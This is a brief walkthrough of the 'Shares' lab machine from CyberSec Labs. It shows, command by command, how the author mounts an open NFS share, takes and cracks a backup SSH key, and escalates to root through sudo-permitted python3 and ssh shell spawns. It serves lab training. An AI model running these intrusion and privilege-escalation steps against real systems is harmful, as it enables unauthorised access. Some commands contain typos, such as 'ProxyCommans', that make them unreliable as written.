172.31.1.7
CyberSec Labs Shares Walkthrough.
As the name itself suggest, it has an nfs share open

Looks like /home/amir can be mounted to our machine
Using mount –t nfs 172.31.1.7:/home/amir /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/ folder

Going to shares folder we find .ssh folder and id_rsa.bak file for user amir


Great so we can use ssh2john and then john to crack the passphrase for this id_rsa.bak


But in normal nmap scan we couldn’t find ssh port, maybe because it was running on higher port.
We can use nmap automator to scan all higher ports quickly

So ssh is running on port 27853 (sweet!)
ssh –I id_rsa –p 27853 amir@172.31.1.7 and we get a shell

Priv Esc
Running sudo –l we get user amy can run python3 as root so
Sudo –u amy /usr/bin/python3 –c “import pty;pty.spawn(‘/bin/bash’)”
And we are logged in as user amy

Again as user amy running sudo –l we come to know user amy can run ssh as root

Easy, ssh gtfobins as sudo and ur root 😛
Sudo /usr/bin/ssh –o ProxyCommans=’;bash 0<&2 1>&2’ x

Flags


Author
Sentinal920
Leave a Reply
You must be logged in to post a comment.